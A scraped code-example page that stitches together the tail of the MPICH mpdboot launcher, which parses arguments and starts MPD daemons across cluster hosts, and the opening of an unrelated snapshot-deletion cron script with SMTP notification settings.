                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx].startswith('--ifhn'):
            splitArg = argv[argidx].split('=')
            myIfhn = splitArg[1]
            myHost = splitArg[1]
            argidx += 1
        elif argv[argidx] == '-n':  # or --totalnum=
            totalnumToStart = int(argv[argidx + 1])
            argidx += 2
        elif argv[argidx].startswith('--totalnum'):
            splitArg = argv[argidx].split('=')
            try:
                totalnumToStart = int(splitArg[1])
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx].startswith('--maxbranch'):
            splitArg = argv[argidx].split('=')
            try:
                maxUnderOneRoot = int(splitArg[1])
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx] == '-d' or argv[argidx] == '--debug':
            debug = 1
            argidx += 1
        elif argv[argidx] == '-s' or argv[argidx] == '--shell':
            shell = 'bourne'
            argidx += 1
        elif argv[argidx] == '-v' or argv[argidx] == '--verbose':
            verbose = 1
            argidx += 1
        elif argv[argidx] == '-c' or argv[argidx] == '--chkup':
            chkupIndicator = 1
            argidx += 1
        elif argv[argidx] == '--chkuponly':
            chkupIndicator = 2
            argidx += 1
        elif argv[argidx] == '-1':
            oneMPDPerHost = 0
            argidx += 1
        elif argv[argidx] == '--loccons':
            localConArg = '-n'
            argidx += 1
        elif argv[argidx] == '--remcons':
            remoteConArg = '-n'
            argidx += 1
        else:
            print 'mpdboot: unrecognized argument:', argv[argidx]
            usage()

    # Fix for tt#662, make sure the config file is available to avoid some very
    # confusing error messages.  We don't actually need these values here.
    parmdb = MPDParmDB()
    parmdb.get_parms_from_rcfile(parmsToOverride={}, errIfMissingFile=1)

    if debug:
        print 'debug: starting'

    lines = []
    if totalnumToStart > 1:
        try:
            f = open(hostsFilename, 'r')
            for line in f:
                lines.append(line)
        except:
            print 'unable to open (or read) hostsfile %s' % (hostsFilename)
            exit(-1)
    hostsAndInfo = [{'host': myHost, 'ncpus': myNcpus, 'ifhn': myIfhn}]
    for line in lines:
        line = line.strip()
        if not line or line[0] == '#':
            continue
        splitLine = re.split(r'\s+', line)
        host = splitLine[0]
        ncpus = 1  # default
        if ':' in host:
            (host, ncpus) = host.split(':', 1)
            ncpus = int(ncpus)
        ifhn = ''  # default
        for kv in splitLine[1:]:
            (k, v) = kv.split('=', 1)
            if k == 'ifhn':
                ifhn = v
        hostsAndInfo.append({'host': host, 'ncpus': ncpus, 'ifhn': ifhn})
    cachedIPs = {}
    if oneMPDPerHost and totalnumToStart > 1:
        oldHostsAndInfo = hostsAndInfo[:]
        hostsAndInfo = []
        for hostAndInfo in oldHostsAndInfo:
            oldhost = hostAndInfo['host']
            try:
                ips = gethostbyname_ex(oldhost)[2]  # may fail if invalid host
            except:
                print 'unable to obtain IP for host:', oldhost
                continue
            uips = {}  # unique ips
            for ip in ips:
                uips[ip] = 1
            keep = 1
            for ip in uips.keys():
                if cachedIPs.has_key(ip):
                    keep = 0
                    break
            if keep:
                hostsAndInfo.append(hostAndInfo)
                cachedIPs.update(uips)
    if len(hostsAndInfo) < totalnumToStart:  # one is local
        print 'totalnum=%d  numhosts=%d' % (totalnumToStart, len(hostsAndInfo))
        print 'there are not enough hosts on which to start all processes'
        exit(-1)
    if chkupIndicator:
        hostsToCheck = [hai['host'] for hai in hostsAndInfo[1:totalnumToStart]]
        (upList, dnList) = chkupdn(hostsToCheck)
        if dnList:
            print "these hosts are down; exiting"
            print dnList
            exit(-1)
        print "there are %d hosts up (counting local)" % (len(upList) + 1)
        if chkupIndicator == 2:  # do the chkup and quit
            exit(0)

    try:
        # stop current (if any) mpds; ignore the output
        getoutput('%s/mpdallexit.py' % (fullDirName))
        if verbose or debug:
            print 'running mpdallexit on %s' % (myHost)
    except:
        pass

    if environ.has_key('MPD_TMPDIR'):
        tmpdir = environ['MPD_TMPDIR']
    else:
        tmpdir = ''
    if myIfhn:
        ifhn = '--ifhn=%s' % (myIfhn)
    else:
        ifhn = ''
    hostsAndInfo[0]['entry_host'] = ''
    hostsAndInfo[0]['entry_port'] = ''
    mpdArgs = '%s %s --ncpus=%d' % (localConArg, ifhn, myNcpus)
    if tmpdir:
        mpdArgs += ' --tmpdir=%s' % (tmpdir)
    (mpdPID, mpdFD) = launch_one_mpd(0, 0, mpdArgs, hostsAndInfo)
    fd2idx = {mpdFD: 0}

    handle_mpd_output(mpdFD, fd2idx, hostsAndInfo)

    try:
        from os import sysconf
        maxfds = sysconf('SC_OPEN_MAX')
    except:
        maxfds = 1024
    maxAtOnce = min(128, maxfds -
                    8)  # -8  for stdeout, etc. + a few more for padding

    hostsSeen = {myHost: 1}
    fdsToSelect = []
    numStarted = 1  # local already going
    numStarting = 0
    numUnderCurrRoot = 0
    possRoots = []
    currRoot = 0
    idxToStart = 1  # local mpd already going
    while numStarted < totalnumToStart:
        if numStarting < maxAtOnce and idxToStart < totalnumToStart:
            if numUnderCurrRoot < maxUnderOneRoot:
                entryHost = hostsAndInfo[currRoot]['host']
                entryPort = hostsAndInfo[currRoot]['list_port']
                hostsAndInfo[idxToStart]['entry_host'] = entryHost
                hostsAndInfo[idxToStart]['entry_port'] = entryPort
                if hostsSeen.has_key(hostsAndInfo[idxToStart]['host']):
                    remoteConArg = '-n'
                myNcpus = hostsAndInfo[idxToStart]['ncpus']
                ifhn = hostsAndInfo[idxToStart]['ifhn']
                if ifhn:
                    ifhn = '--ifhn=%s' % (ifhn)
                mpdArgs = '%s -h %s -p %s %s --ncpus=%d' % (
                    remoteConArg, entryHost, entryPort, ifhn, myNcpus)
                if tmpdir:
                    mpdArgs += ' --tmpdir=%s' % (tmpdir)
                (mpdPID, mpdFD) = launch_one_mpd(idxToStart, currRoot, mpdArgs,
                                                 hostsAndInfo)
                numStarting += 1
                numUnderCurrRoot += 1
                hostsAndInfo[idxToStart]['pid'] = mpdPID
                hostsSeen[hostsAndInfo[idxToStart]['host']] = 1
                fd2idx[mpdFD] = idxToStart
                fdsToSelect.append(mpdFD)
                idxToStart += 1
            else:
                if possRoots:
                    currRoot = possRoots.pop()
                    numUnderCurrRoot = 0
            selectTime = 0.01
        else:
            selectTime = 0.1
        try:
            (readyFDs, unused1, unused2) = select(fdsToSelect, [], [],
                                                  selectTime)
        except error, errmsg:
            mpd_print(1, 'mpdboot: select failed: errmsg=:%s:' % (errmsg))
            exit(-1)
        for fd in readyFDs:
            handle_mpd_output(fd, fd2idx, hostsAndInfo)
            numStarted += 1
            numStarting -= 1
            possRoots.append(fd2idx[fd])
            fdsToSelect.remove(fd)
            fd.close()
Exemple #60
0
# 12 4 * * 7 python /path/to/snap_delete.py

import subprocess
import json
import datetime
import smtplib
import socket
try:
    from email.mime.text import MIMEText
except ImportError:
    # Python 2.4 (CentOS 5.x)
    from email.MIMEText import MIMEText

# Change this to some value if you don't want your server hostname to show in
# the notification emails
THIS_SERVER = socket.gethostname()

# Server hostname or IP address
SMTP_SERVER = 'yourdomain.com.mail.protection.outlook.com'
SMTP_PORT = 25

# Set to True if you need SMTP over SSL
SMTP_SSL = False

# Set to True if you need to authenticate to your SMTP server
SMTP_AUTH = False
# Fill in authorization information here if True above
SMTP_USERNAME = '******'
SMTP_PASSWORD = ''

# Takes a single sender